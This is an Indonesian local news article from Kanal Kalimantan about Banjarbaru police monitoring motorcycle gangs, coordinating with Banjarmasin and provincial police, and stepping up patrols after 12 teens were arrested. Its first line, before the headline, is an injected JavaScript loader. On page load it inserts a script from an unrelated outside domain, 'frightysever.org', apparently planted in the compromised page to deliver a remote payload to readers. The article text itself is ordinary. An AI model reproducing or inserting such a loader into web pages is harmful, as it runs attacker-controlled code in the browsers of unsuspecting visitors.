(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Ulah Geng Motor Bikin Resah, Ini yang Dilakukan Polres Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Ulah sekawanan geng motor di Banjarmasin yang mengganggu keamanan dan ketertiban belakangan ikut menimbulkan keresahan bagi masyarakat di Banjarbaru.

Meski belum ditemukan adanya laporan terkait gangguan yang timbulkan di wilayah hukum Banjarbaru, namun aparat kepolisian mengaku tengah memonitor kasus tersebut.

Kapolres Banjarbaru AKBP Dody Harza Kusumah melalui Kasi Humas AKP Syahruji mengatakan, wilayah hukum Banjarbaru masih aman dan kondusif.

Baca juga: Perbaikan Pipa Bocor di Jalan Pramuka, Berikut Wilayah Terdampak Seret Air 12 Jam

“Alhamdulillah hingga saat ini wilayah hukum Banjarbaru masih aman dan kondusif dari kegiatan tersebut,” ujar Kapolres Banjarbaru AKBP Dody Harza Kusumah melalui Kasi Humas AKP Syahruji, Selasa (24/10/2023) malam.

Ia mengatakan Polres Banjarbaru saat ini sudah berkordinasi dengan Polresta Banjarmasin hingga Polda Kalsel.

Menyusul adanya penangkapan 12 remaja geng motor yang sebelumnya mengancam ketenangan warga Kota Banjarmasin dengan aksi penyerangan.

Baca juga: Waspada Penyakit Demam Berdarah Masuki Musim Hujan

“Secara intens kita berkordinasi dengan Polda dan Polresta Banjarmasin terkait perkembangan situasi manakala akan ada pergerakan dan lainnya,” jelas dia.

Saat ini juga sejumlah personil kepolisian dikerahkan ke masing-masing tempat yang telah dipetakan, yang memungkinkan para gengster itu berkumpul.

Patroli rutin juga terus ditingkatkan aparat kepolisian dengan lebih banyak melibatkan personil dari satuan fungsi seperti Intel, Sabhara, Lalu lintas, Reskrim, Sat Resnarkoba, Binmas dan Propam.

“Kita bentuk Unit Kecil Lengkap (UKL) dalam sekala besar yang jumlahnya ada sekitar 25 sampai 30 personil untuk melaksanakan patroli dan pemantauan pada tempat-tempat di mapping,” sebut dia.

Salah satu yang bisa masyarakat lakukan, sebut dia adalah terus berhati-hati, apabila menemui adanya kelompok yang diduga gengster atau geng motor dapat segera melaporkannya langsung ke Polres Banjarbaru.

“Informasi sedini mungkin juga bisa dilakukan melalui call centre 110 dan atau melalui Aplikasi Cangkal Polres Banjarbaru, kota menghimbau kepada warga Banjarbaru maupun luar Banjarbaru agar dapat terus berhati-hati,” imbuhnya.

Dirinya pun menegaskan akan melakukan tindakan sesuai aturan hukum yang berlaku manakala menemukan peristiwa atas kejahatan atau pelanggaraan yang dilakukan para gengster. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

5 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

6 jam ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

8 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

10 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

11 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

13 jam ago

This website uses cookies.